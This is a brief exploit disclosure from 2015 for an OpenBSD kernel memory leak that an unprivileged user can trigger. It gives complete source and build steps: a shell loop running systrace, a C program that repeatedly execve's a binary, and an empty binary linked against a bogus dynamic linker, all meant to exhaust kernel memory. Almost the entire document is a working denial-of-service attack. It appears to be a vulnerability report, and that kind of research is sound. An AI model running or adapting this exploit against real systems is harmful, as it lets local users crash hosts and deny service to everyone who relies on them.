/*
* 2015, Maxime Villard
* Exploit triggering a memory leak in the OpenBSD kernel from an unprivileged
* user. Found by The Brainy Code Scanner.
*/
- - - - - - - - - - - - - - - - - script.sh - - - - - - - - - - - - - - - - - -
#! /bin/sh
while true
do
systrace -A ./exploit
done
- - - - - - - - - - - - - - - - - exploit.c - - - - - - - - - - - - - - - - - -
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char *argv[]) {
execve("bin", argv, NULL);
}
- - - - - - - - - - - - - - - - - - bin.c - - - - - - - - - - - - - - - - - - -
int main() {}
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
$ gcc -o exploit exploit.c
$ gcc -Wl,-dynamic-linker,/DEAD -o bin bin.c
$ ./script.sh
Wait a bit, and the kernel will run out of memory.
